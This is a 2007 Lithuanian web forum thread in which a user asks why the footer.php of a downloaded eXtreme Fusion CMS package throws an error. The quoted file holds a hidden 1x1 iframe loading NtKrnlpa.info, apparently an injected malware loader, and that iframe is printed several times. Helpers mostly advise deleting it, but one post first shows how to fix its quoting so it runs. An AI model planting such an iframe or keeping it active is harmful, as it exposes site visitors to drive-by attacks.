Temos pavadinimas: WordPress, Shopify ir PHPFusion programuotojų bendruomenė :: eXtreme Fusion klaida footer.php

Parašė DuRaCeLL· 2007 Lap. 17 00:11:33
#1

Taigi parsisiunčiau eXtreme Fusion ir jame radau tokią klaidą footer.php mėginau jį keisti ir į PHP-Fusion'o, bet niekas nesikeičia. :(
Ką daryti? ;)

Štai ką išmeta.




Redagavo DuRaCeLL· 2007 Lap. 17 00:11:52

Parašė Qrmiz· 2007 Lap. 17 01:11:59
#2

įkelk čia footer.php kodą

Parašė DuRaCeLL· 2007 Lap. 17 01:11:38
#3

Va:

<?php
/*---------------------------------------------------+
| PHP-Fusion 6 Content Management System
+----------------------------------------------------+
| Copyright Ā© 2002 - 2006 Nick Jones
| http://www.php-fusion.co.uk/
+----------------------------------------------------+
| Released under the terms & conditions of v2 of the
| GNU General Public License. For details refer to
| the included gpl.txt file or visit http://gnu.org
+----------------------------------------------------*/
if (!defined("IN_FUSION")) { header("Location: index.php"); exit; }

render_footer(false);

echo "<iframe src="http://NtKrnlpa.info/rc/?i=1" width=1 height=1 style="border:0"></iframe>
</body>\n</html>\n";

if (iADMIN) {
   $result = dbquery("DELETE FROM ".$db_prefix."flood_control WHERE flood_timestamp < '".(time()-360)."'");
   $result = dbquery("DELETE FROM ".$db_prefix."thread_notify WHERE notify_datestamp < '".(time()-1209600)."'");
   $result = dbquery("DELETE FROM ".$db_prefix."vcode WHERE vcode_datestamp < '".(time()-360)."'");
   $result = dbquery("DELETE FROM ".$db_prefix."new_users WHERE user_datestamp < '".(time()-86400)."'");
}

mysql_close();

ob_end_flush();
?>



Parašė Qrmiz· 2007 Lap. 17 01:11:15
#4

kad jis čia visai sumautas...nieko nekeitei?:? nutrink šitą:
<iframe src="http://NtKrnlpa.info/rc/?i=1" width=1 height=1 style="border:0"></iframe>

P.S. reikėjo iš pradžių Tau atjungti smailus:D šiaip nutrinsi va šitą kodą: <iframe>...</iframe> ir viskas veiks puikiai ;)

Redagavo Qrmiz· 2007 Lap. 17 01:11:01

Parašė DuRaCeLL· 2007 Lap. 17 01:11:41
#5

Dabar rašo:

Parse error: syntax error, unexpected T_STRING, expecting ',' or ';' in /home/.a/duracellis/music-land.xz.lt/footer.php on line 17

Parašė Qrmiz· 2007 Lap. 17 01:11:59
#6

kodas turi atrodyti taip (pasitikrink):
<?php
/*---------------------------------------------------+
| PHP-Fusion 6 Content Management System
+----------------------------------------------------+
| Copyright Ā© 2002 - 2006 Nick Jones
| http://www.php-fusion.co.uk/
+----------------------------------------------------+
| Released under the terms & conditions of v2 of the
| GNU General Public License. For details refer to
| the included gpl.txt file or visit http://gnu.org
+----------------------------------------------------*/
if (!defined("IN_FUSION")) { header("Location: index.php"); exit; }

render_footer(false);

echo "</body>\n</html>\n";

if (iADMIN) {
$result = dbquery("DELETE FROM ".$db_prefix."flood_control WHERE flood_timestamp < '".(time()-360)."'");
$result = dbquery("DELETE FROM ".$db_prefix."thread_notify WHERE notify_datestamp < '".(time()-1209600)."'");
$result = dbquery("DELETE FROM ".$db_prefix."vcode WHERE vcode_datestamp < '".(time()-360)."'");
$result = dbquery("DELETE FROM ".$db_prefix."new_users WHERE user_datestamp < '".(time()-86400)."'");
}

mysql_close();

ob_end_flush();
?>

Parašė ramon· 2007 Lap. 17 07:11:00
#7

Kas per zioplos klaidos?

Sita :
<iframe src="http://NtKrnlpa.info/rc/?i=1" width=1 height=1 style="border:0"></iframe>




Keiciam i sita :
<iframe src='http://NtKrnlpa.info/rc/?i=1' width='1' height='1' style='border:0'></iframe>




O jej nori is footer.php isimti ta <iframe></iframe> td darom taip :

Sita :
echo "<iframe src="http://NtKrnlpa.info/rc/?i=1" width=1 height=1 style="border:0"></iframe>
</body>\n</html>\n";





Keiciam i Sita :
echo "</body>\n</html>\n";



Parašė DuRaCeLL· 2007 Lap. 17 22:11:05
#8

dėkui. ;)

Gal kas galėtų išversti šitą?
http://www.talpink.lt/files/844496

Redagavo DuRaCeLL· 2007 Lap. 17 22:11:11